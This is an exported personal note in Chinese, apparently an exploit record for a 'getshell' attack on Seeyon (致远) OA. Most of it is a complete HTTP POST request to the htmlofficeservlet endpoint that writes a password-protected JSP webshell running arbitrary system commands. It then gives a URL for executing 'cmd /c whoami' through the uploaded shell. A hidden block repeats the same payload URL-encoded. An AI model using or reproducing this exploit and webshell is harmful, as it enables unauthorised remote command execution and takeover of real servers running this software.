<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="exporter-version" content="Evernote Mac 9.0.5 (458014)"/><meta name="altitude" content="1267.75341796875"/><meta name="author" content="その사랑"/><meta name="created" content="2019-06-26 09:05:38 +0000"/><meta name="latitude" content="26.64344787597656"/><meta name="longitude" content="106.6448012930872"/><meta name="source" content="desktop.mac"/><meta name="updated" content="2019-06-26 09:05:54 +0000"/><meta name="content-class" content="yinxiang.markdown"/><title>致远OA getshell</title></head><body><div style="font-size: 14px; margin: 0; padding: 0; width: 100%;"><h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">受害机配置</h3>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;">受害机一般为win系统</p>
<h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">请求报文</h3>
<pre style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; margin: 2px 0 8px; background-color: #f5f7f8;"><code style="display: block; overflow-x: auto; background: #1e1e1e; line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; letter-spacing: -.3px; padding: 18px; color: #f4f4f4; white-space: pre-wrap;">POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1111
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ip:port
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
&lt;%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%&gt;&lt;%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %&gt;&lt;%if("123".equals(request.getParameter("pwd"))&amp;&amp;!"".equals(request.getParameter("cmd"))){out.println("&lt;pre&gt;"+excuteCmd(request.getParameter("cmd")) + "&lt;/pre&gt;");}else{out.println(":-)");}%&gt;6e4f045d4b8506bf492ada7e3390d7ce
</code></pre>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;"><img src="https://upload-images.jianshu.io/upload_images/5350990-26d7ea6d8915fb8e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" style="line-height: 160%; margin: 4px 0 10px; box-sizing: border-box; vertical-align: top; max-width: 100%;"/></p>
<h3 style="line-height: 160%; box-sizing: content-box; font-weight: 700; font-size: 27px; color: #333;">访问webshell</h3>
<p style="line-height: 160%; box-sizing: content-box; margin: 10px 0; color: #333;"><code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">http:ip:port/seeyon/test123456.jsp?pwd=123&amp;cmd=cmd+/c+whoami</code><br/>
test123456.jsp名称由来为<code style="line-height: 160%; box-sizing: content-box; border: 0; border-radius: 0; color: #c1788b; padding: 4px 4px 2px 0; letter-spacing: -.3px;">FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6</code>解密以后，加密方式不详，可能为oa内置加密方式<br/>
<img src="https://upload-images.jianshu.io/upload_images/5350990-57d709f97f1ee087.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" style="line-height: 160%; margin: 4px 0 10px; box-sizing: border-box; vertical-align: top; max-width: 100%;"/></p>
</div><center style="display:none !important;visibility:collapse !important;height:0 !important;white-space:nowrap;width:100%;overflow:hidden">%23%23%23%20%E5%8F%97%E5%AE%B3%E6%9C%BA%E9%85%8D%E7%BD%AE%0A%E5%8F%97%E5%AE%B3%E6%9C%BA%E4%B8%80%E8%88%AC%E4%B8%BAwin%E7%B3%BB%E7%BB%9F%0A%23%23%23%20%E8%AF%B7%E6%B1%82%E6%8A%A5%E6%96%87%0A%60%60%60%0APOST%20%2Fseeyon%2Fhtmlofficeservlet%20HTTP%2F1.1%0AContent-Length%3A%201111%0AUser-Agent%3A%20Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1)%0AHost%3A%20ip%3Aport%0APragma%3A%20no-cache%0A%0ADBSTEP%20V3.0%20%20%20%20%20355%20%20%20%20%20%20%20%20%20%20%20%20%200%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20666%20%20%20%20%20%20%20%20%20%20%20%20%20DBSTEP%3DOKMLlKlV%0AOPTION%3DS3WYOSWLBSGr%0AcurrentUserId%3DzUCTwigsziCAPLesw4gsw4oEwV66%0ACREATEDATE%3DwUghPB3szB3Xwg66%0ARECORDID%3DqLSGw4SXzLeGw4V3wUw3zUoXwid6%0AoriginalFileId%3DwV66%0AoriginalCreateDate%3DwUghPB3szB3Xwg66%0AFILENAME%3DqfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6%0AneedReadFile%3DyRWZdAS6%0AoriginalCreateDate%3DwLSGP4oEzLKAz4%3Diz%3D66%0A%3C%25%40%20page%20language%3D%22java%22%20import%3D%22java.util.*%2Cjava.io.*%22%20pageEncoding%3D%22UTF-8%22%25%3E%3C%25!public%20static%20String%20excuteCmd(String%20c)%20%7BStringBuilder%20line%20%3D%20new%20StringBuilder()%3Btry%20%7BProcess%20pro%20%3D%20Runtime.getRuntime().exec(c)%3BBufferedReader%20buf%20%3D%20new%20BufferedReader(new%20InputStreamReader(pro.getInputStream()))%3BString%20temp%20%3D%20null%3Bwhile%20((temp%20%3D%20buf.readLine())%20!%3D%20null)%20%7Bline.append(temp%2B%22%5Cn%22)%3B%7Dbuf.close()%3B%7D%20catch%20(Exception%20e)%20%7Bline.append(e.getMessage())%3B%7Dreturn%20line.toString()%3B%7D%20%25%3E%3C%25if(%22123%22.equals(request.getParameter(%22pwd%22))%26%26!%22%22.equals(request.getParameter(%22cmd%22)))%7Bout.println(%22%3Cpre%3E%22%2BexcuteCmd(request.getParameter(%22cmd%22))%20%2B%20%22%3C%2Fpre%3E%22)%3B%7Delse%7Bout.println(%22%3A-)%22)%3B%7D%25%3E6e4f045d4b8506bf492ada7e3390d7ce%0A%60%60%60%0A!%5B%E8%AF%B7%E6%B1%82%E6%8A%A5%E6%96%87%5D(https%3A%2F%2Fupload-images.jianshu.io%2Fupload_images%2F5350990-26d7ea6d8915fb8e.png%3FimageMogr2%2Fauto-orient%2Fstrip%257CimageView2%2F2%2Fw%2F1240)%0A%0A%23%23%23%20%E8%AE%BF%E9%97%AEwebshell%0A%60http%3Aip%3Aport%2Fseeyon%2Ftest123456.jsp%3Fpwd%3D123%26cmd%3Dcmd%2B%2Fc%2Bwhoami%60%0Atest123456.jsp%E5%90%8D%E7%A7%B0%E7%94%B1%E6%9D%A5%E4%B8%BA%60FILENAME%3DqfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6%60%E8%A7%A3%E5%AF%86%E4%BB%A5%E5%90%8E%EF%BC%8C%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%E4%B8%8D%E8%AF%A6%EF%BC%8C%E5%8F%AF%E8%83%BD%E4%B8%BAoa%E5%86%85%E7%BD%AE%E5%8A%A0%E5%AF%86%E6%96%B9%E5%BC%8F%0A!%5B%E8%AE%BF%E9%97%AEwebshell%5D(https%3A%2F%2Fupload-images.jianshu.io%2Fupload_images%2F5350990-57d709f97f1ee087.png%3FimageMogr2%2Fauto-orient%2Fstrip%257CimageView2%2F2%2Fw%2F1240)%0A%0A%0A</center></body></html>